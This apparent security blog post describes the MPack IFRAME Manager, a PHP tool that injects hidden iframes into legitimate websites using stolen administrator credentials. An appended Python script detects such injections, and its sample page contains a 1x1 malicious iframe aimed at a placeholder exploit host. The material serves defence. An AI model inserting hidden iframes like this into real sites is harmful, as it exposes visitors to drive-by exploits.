MPack: the Strange Case of the Mass-Hacking Tool
You always thought that by staying clear of the dark alleys of the Internet and visiting only “reputable” websites, you would be safe from attacks and dubious content. I am afraid that is not enough. My colleagues Elia Florio and Hon Lau reported recently (here and here) about legitimate sites that had been compromised to include a malicious IFRAME that, without your knowledge, redirects you to a site serving exploits.
As Elia mentioned, thousands of sites (mostly Italian, but with several other nationalities included) were compromised. We were puzzled as to how the MPack gang had managed to hack so many sites in a short period of time, and how they could inject the malicious iframe so quickly.
The MPack gang appears to be using an IFRAME Manager tool to automate the task on a large scale. This is basically an FTP updater client, written in PHP, that runs on a web server with MySQL as a back-end. It takes as input a list of website administrator accounts (possibly obtained on the black market). It then periodically checks the home pages of those sites to inject a chosen IFRAME into their code.
This iframe manager is another example of a very user-friendly tool with a clear intent of being resold to multiple hacking groups. As such, it offers a number of interesting features. It allows the iframe to be injected at the top or bottom of the page, and you can use regular expressions when defining the pages to be compromised, such as index[.php|.htm|.html]|default.asp. To maximize the return on investment, the tool can check the Google PageRank of the potential websites before injecting the iframe, allowing you to select any number of sites with a certain PageRank in a certain country. Furthermore, the tool can be left running and will cycle through the list of sites and re-inject the iframe, should the pages have been cleaned by the site administrator.
To assist the miscreants in this competitive hacker-eat-hacker world, the tool also allows for the removal of any competitors’ iframes injected in the page. And of course, extensive logs and statistics are provided.
This tool itself, however, cannot hack the websites; it relies on a list of compromised credentials to insert the desired iframe into the websites. Therefore a simple clean-up of the page is not sufficient; the site administrator’s credentials need to be changed. To protect yourself as a web surfer, make sure your operating system is up to date with the latest patches, as is your anti-virus program.
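Since the tool re-injects its frame after a clean-up, site owners need a recurring check rather than a one-off fix. The following is an added example (not code from the original post or from the tool it describes): it parses a home page, lists every iframe, and flags frames whose source host is outside an allow-list or whose size makes them invisible. The sample page and the `exploit-host.invalid` hostname are constructed placeholders, not indicators from the incident.

```python
# Added example: audit a fetched home page for injected IFRAMEs.
from html.parser import HTMLParser
from urllib.parse import urlparse


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # normalise attribute names; bare attributes become empty strings
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_hidden(attrs):
    """True when the frame is 0/1 px in either dimension or styled invisible."""
    dims = [attrs.get("width", ""), attrs.get("height", "")]
    if any(d.strip().rstrip("px").strip() in ("0", "1") for d in dims):
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def audit_iframes(html, trusted_hosts):
    """Return a list of (src, reason) for iframes that look injected.

    trusted_hosts: hostnames the site legitimately embeds (its own domains,
    known partners). Relative sources are only flagged when hidden.
    """
    parser = _IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        if host and host not in trusted_hosts:
            findings.append((src, "untrusted host " + host))
        elif _is_hidden(attrs):
            findings.append((src, "hidden frame"))
    return findings


# Constructed sample: one legitimate embed plus a 1x1 frame appended after the
# closing tags, which is where this kind of tool places its injection.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="http://www.example.com/news.html" width="600" height="200"></iframe>
</body></html>
<iframe src="http://exploit-host.invalid/in.cgi" width="1" height="1"></iframe>"""

if __name__ == "__main__":
    for src, reason in audit_iframes(SAMPLE_PAGE, {"www.example.com"}):
        print(f"ALERT {reason}: {src}")
```

Run it on a schedule against each default document (index.php, index.htm, default.asp and so on) and alert on any finding; a page that comes back clean one hour and flagged the next is the re-injection cycle the post describes.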
